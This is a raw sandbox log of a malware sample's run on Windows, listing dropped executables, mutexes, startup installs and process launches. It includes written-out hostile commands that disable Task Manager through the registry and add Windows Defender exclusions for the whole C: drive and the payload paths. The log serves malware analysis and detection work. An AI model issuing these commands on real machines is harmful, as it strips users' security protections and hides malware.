                                Source: C:\Users\user\AppData\Local\Temp\drivEn760.exeCode function: 3_2_00404AB5 GetDlgItem,SetWindowTextW,SHAutoComplete,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceExW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,3_2_00404AB5
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: OpenSCManagerW,CreateServiceW,CloseServiceHandle,GetLastError,GetLastError,CloseServiceHandle,GetLastError,6_2_00007FF63D475A30
                                Source: C:\Program Files\Everything\Everything.exeCode function: OpenSCManagerW,CreateServiceW,CloseServiceHandle,GetLastError,GetLastError,CloseServiceHandle,GetLastError,7_2_00007FF728BB5A30
                                Source: C:\Program Files\Everything\Everything.exeCode function: OpenSCManagerW,CreateServiceW,CloseServiceHandle,GetLastError,GetLastError,CloseServiceHandle,GetLastError,10_2_00007FF728BB5A30
                                Source: C:\Users\user\AppData\Local\Temp\drivEn760.exeCode function: 3_2_004021AA CoCreateInstance,3_2_004021AA
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeCode function: 2_2_00CDA6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,2_2_00CDA6C2
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 6_2_00007FF63D475670 StartServiceCtrlDispatcherW,6_2_00007FF63D475670
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 6_2_00007FF63D475670 StartServiceCtrlDispatcherW,6_2_00007FF63D475670
                                Source: C:\Program Files\Everything\Everything.exeCode function: 7_2_00007FF728BB5670 StartServiceCtrlDispatcherW,7_2_00007FF728BB5670
                                Source: C:\Program Files\Everything\Everything.exeCode function: 10_2_00007FF728BB5670 StartServiceCtrlDispatcherW,10_2_00007FF728BB5670
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeFile created: C:\Program Files\EverythingJump to behavior
                                Source: C:\Users\user\Desktop\wxl1r0lntg.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v2.0Jump to behavior
                                Source: C:\Windows\BitLockerDiscoveryVolumeContents\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeMutant created: NULL
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2172:120:WilError_03
                                Source: C:\Program Files\Everything\Everything.exeMutant created: \Sessions\1\BaseNamedObjects\EVERYTHING_MUTEX
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5604:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1292:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7860:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1680:120:WilError_03
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeMutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-D9v2NJXg7O8XLMbKG3IO
                                Source: C:\Users\user\Desktop\wxl1r0lntg.exeFile created: C:\Users\user\AppData\Local\Temp\sqls211.exeJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\2PE3PxTrTQg.bat" "
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeCommand line argument: sfxname2_2_00CDDF1E
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeCommand line argument: sfxstime2_2_00CDDF1E
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeCommand line argument: STARTDLG2_2_00CDDF1E
                                Source: wxl1r0lntg.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                Source: wxl1r0lntg.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                Source: C:\Users\user\Desktop\wxl1r0lntg.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                                Source: C:\Users\user\Desktop\wxl1r0lntg.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                Source: wxl1r0lntg.exeReversingLabs: Detection: 73%
                                Source: Everything.exeString found in binary or memory: -install-folder-context-menu
                                Source: Everything.exeString found in binary or memory: -install-start-menu-shortcuts
                                Source: Everything.exeString found in binary or memory: -install-start-menu-shortcuts
                                Source: Everything.exeString found in binary or memory: -uninstall-start-menu-shortcuts
                                Source: Everything.exeString found in binary or memory: -install "%s"
                                Source: Everything.exeString found in binary or memory: -install-options "%s"
                                Source: Everything.exeString found in binary or memory: -install-run-on-system-startup
                                Source: Everything.exeString found in binary or memory: -install-run-on-system-startup
                                Source: Everything.exeString found in binary or memory: -uninstall-run-on-system-startup
                                Source: Everything.exeString found in binary or memory: -install-efu-association
                                Source: Everything.exeString found in binary or memory: -save-install-options %u
                                Source: Everything.exeString found in binary or memory: -install-language %d
                                Source: Everything.exeString found in binary or memory: -stop-service
                                Source: Everything.exeString found in binary or memory: -start-service
                                Source: Everything.exeString found in binary or memory: -install-desktop-shortcut
                                Source: Everything.exeString found in binary or memory: -install-url-protocol
                                Source: Everything.exeString found in binary or memory: -stop-client-service
                                Source: Everything.exeString found in binary or memory: -start-client-service
                                Source: Everything.exeString found in binary or memory: -install-client-service
                                Source: Everything.exeString found in binary or memory: -install-service
                                Source: Everything.exeString found in binary or memory: -install-service-pipe-name "%s"
                                Source: Everything.exeString found in binary or memory: -install-service-security-descriptor "%s"
                                Source: Everything.exeString found in binary or memory: -install-service
                                Source: Everything.exeString found in binary or memory: -install-service-pipe-name "%s"
                                Source: Everything.exeString found in binary or memory: -install-service-security-descriptor "%s"
                                Source: Everything.exeString found in binary or memory: -stop-client-service
                                Source: Everything.exeString found in binary or memory: -start-client-service
                                Source: Everything.exeString found in binary or memory: -install-client-service
                                Source: Everything.exeString found in binary or memory: -install-url-protocol
                                Source: Everything.exeString found in binary or memory: -install-efu-association
                                Source: Everything.exeString found in binary or memory: -install-language %d
                                Source: Everything.exeString found in binary or memory: -save-install-options %u
                                Source: Everything.exeString found in binary or memory: -start-service
                                Source: Everything.exeString found in binary or memory: -stop-service
                                Source: Everything.exeString found in binary or memory: -install-run-on-system-startup
                                Source: Everything.exeString found in binary or memory: -install-run-on-system-startup
                                Source: Everything.exeString found in binary or memory: -uninstall-run-on-system-startup
                                Source: Everything.exeString found in binary or memory: -install-folder-context-menu
                                Source: Everything.exeString found in binary or memory: -install-start-menu-shortcuts
                                Source: Everything.exeString found in binary or memory: -install-start-menu-shortcuts
                                Source: Everything.exeString found in binary or memory: -uninstall-start-menu-shortcuts
                                Source: Everything.exeString found in binary or memory: -install-desktop-shortcut
                                Source: Everything.exeString found in binary or memory: -install-options "%s"
                                Source: Everything.exeString found in binary or memory: -install "%s"
                                Source: Everything.exeString found in binary or memory: -install-service
                                Source: Everything.exeString found in binary or memory: -install-service-pipe-name "%s"
                                Source: Everything.exeString found in binary or memory: -install-service-security-descriptor "%s"
                                Source: Everything.exeString found in binary or memory: -stop-client-service
                                Source: Everything.exeString found in binary or memory: -start-client-service
                                Source: Everything.exeString found in binary or memory: -install-client-service
                                Source: Everything.exeString found in binary or memory: -install-url-protocol
                                Source: Everything.exeString found in binary or memory: -install-efu-association
                                Source: Everything.exeString found in binary or memory: -install-language %d
                                Source: Everything.exeString found in binary or memory: -save-install-options %u
                                Source: Everything.exeString found in binary or memory: -start-service
                                Source: Everything.exeString found in binary or memory: -stop-service
                                Source: Everything.exeString found in binary or memory: -install-run-on-system-startup
                                Source: Everything.exeString found in binary or memory: -install-run-on-system-startup
                                Source: Everything.exeString found in binary or memory: -uninstall-run-on-system-startup
                                Source: Everything.exeString found in binary or memory: -install-folder-context-menu
                                Source: Everything.exeString found in binary or memory: -install-start-menu-shortcuts
                                Source: Everything.exeString found in binary or memory: -install-start-menu-shortcuts
                                Source: Everything.exeString found in binary or memory: -uninstall-start-menu-shortcuts
                                Source: Everything.exeString found in binary or memory: -install-desktop-shortcut
                                Source: Everything.exeString found in binary or memory: -install-options "%s"
                                Source: Everything.exeString found in binary or memory: -install "%s"
                                Source: unknownProcess created: C:\Users\user\Desktop\wxl1r0lntg.exe "C:\Users\user\Desktop\wxl1r0lntg.exe"
                                Source: C:\Users\user\Desktop\wxl1r0lntg.exeProcess created: C:\Users\user\AppData\Local\Temp\sqls211.exe "C:\Users\user\AppData\Local\Temp\sqls211.exe"
                                Source: C:\Users\user\Desktop\wxl1r0lntg.exeProcess created: C:\Users\user\AppData\Local\Temp\drivEn760.exe "C:\Users\user\AppData\Local\Temp\drivEn760.exe"
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\2zt0n56bOhbwB2KzszETxYw2RuinHOyyQibCEaRYFawepzaxIU2GKt.vbe"
                                Source: C:\Users\user\AppData\Local\Temp\drivEn760.exeProcess created: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exe "C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exe" -install "C:\Program Files\Everything" -install-options " -app-data -install-run-on-system-startup -install-service -disable-run-as-admin -uninstall-folder-context-menu -install-start-menu-shortcuts -install-desktop-shortcut -uninstall-url-protocol -install-efu-association -install-language 1033 -save-install-options 0"
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeProcess created: C:\Program Files\Everything\Everything.exe "C:\Program Files\Everything\Everything.exe" -app-data -install-run-on-system-startup -install-service -disable-run-as-admin -uninstall-folder-context-menu -install-start-menu-shortcuts -install-desktop-shortcut -uninstall-url-protocol -install-efu-association -install-language 1033 -save-install-options 0
                                Source: unknownProcess created: C:\Program Files\Everything\Everything.exe "C:\Program Files\Everything\Everything.exe" -svc
                                Source: C:\Users\user\AppData\Local\Temp\drivEn760.exeProcess created: C:\Program Files\Everything\Everything.exe "C:\Program Files\Everything\Everything.exe" -disable-update-notification -uninstall-quick-launch-shortcut -no-choose-volumes -language 1033
                                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\2PE3PxTrTQg.bat" "
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exe "C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet/containerwebruntime.exe"
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xwmh3iv5\xwmh3iv5.cmdline"
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESAD56.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSCCB61929627DF440F9E17C549CE99168.TMP"
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dcil424w\dcil424w.cmdline"
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\AppData\Local\Temp\drivEn760.exeProcess created: C:\Program Files\Everything\Everything.exe "C:\Program Files\Everything\Everything.exe"
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESAFE6.tmp" "c:\Windows\System32\CSCE2A537B39618441DAC64E34137FF17.TMP"
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pgfcrwpp\pgfcrwpp.cmdline"
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB66E.tmp" "c:\Program Files\Everything\CSCA17046CBF8B64A188168A4AB380809F.TMP"
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe'
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows nt\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe'
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\apppatch\CustomSDB\sihost.exe'
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\RuntimeBroker.exe'
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\BitLockerDiscoveryVolumeContents\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe'
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exe'
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\KDhudFNWvk.bat"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: unknownProcess created: C:\Program Files\Everything\Everything.exe "C:\Program Files\Everything\Everything.exe" -startup
                                Source: C:\Program Files\Everything\Everything.exeProcess created: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe "C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe"
                                Source: C:\Program Files\Everything\Everything.exeProcess created: C:\Program Files\Everything\Everything.exe.exe "C:\Program Files\Everything\Everything.exe.exe" -startup
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                Source: unknownProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe "C:\Windows\BitLockerDiscoveryVolumeContents\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\Windows NT\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe "C:\Program Files (x86)\windows nt\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe"
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                Source: unknownProcess created: C:\Windows\apppatch\CustomSDB\sihost.exe "C:\Windows\apppatch\CustomSDB\sihost.exe"
                                Source: unknownProcess created: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exe "C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exe"
                                Source: unknownProcess created: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe "C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe"
                                Source: unknownProcess created: C:\Program Files (x86)\Windows NT\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe "C:\Program Files (x86)\windows nt\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe"
                                Source: unknownProcess created: C:\Windows\apppatch\CustomSDB\sihost.exe "C:\Windows\apppatch\CustomSDB\sihost.exe"
                                Source: unknownProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe "C:\Windows\BitLockerDiscoveryVolumeContents\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe"
                                Source: C:\Users\user\Desktop\wxl1r0lntg.exeProcess created: C:\Users\user\AppData\Local\Temp\sqls211.exe "C:\Users\user\AppData\Local\Temp\sqls211.exe" Jump to behavior
                                Source: C:\Users\user\Desktop\wxl1r0lntg.exeProcess created: C:\Users\user\AppData\Local\Temp\drivEn760.exe "C:\Users\user\AppData\Local\Temp\drivEn760.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\2zt0n56bOhbwB2KzszETxYw2RuinHOyyQibCEaRYFawepzaxIU2GKt.vbe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\drivEn760.exeProcess created: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exe "C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exe" -install "C:\Program Files\Everything" -install-options " -app-data -install-run-on-system-startup -install-service -disable-run-as-admin -uninstall-folder-context-menu -install-start-menu-shortcuts -install-desktop-shortcut -uninstall-url-protocol -install-efu-association -install-language 1033 -save-install-options 0"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\drivEn760.exeProcess created: C:\Program Files\Everything\Everything.exe "C:\Program Files\Everything\Everything.exe" -disable-update-notification -uninstall-quick-launch-shortcut -no-choose-volumes -language 1033Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\drivEn760.exeProcess created: C:\Program Files\Everything\Everything.exe "C:\Program Files\Everything\Everything.exe"Jump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\2PE3PxTrTQg.bat" "Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeProcess created: C:\Program Files\Everything\Everything.exe "C:\Program Files\Everything\Everything.exe" -app-data -install-run-on-system-startup -install-service -disable-run-as-admin -uninstall-folder-context-menu -install-start-menu-shortcuts -install-desktop-shortcut -uninstall-url-protocol -install-efu-association -install-language 1033 -save-install-options 0Jump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exe "C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet/containerwebruntime.exe"
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xwmh3iv5\xwmh3iv5.cmdline"
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dcil424w\dcil424w.cmdline"
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pgfcrwpp\pgfcrwpp.cmdline"
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
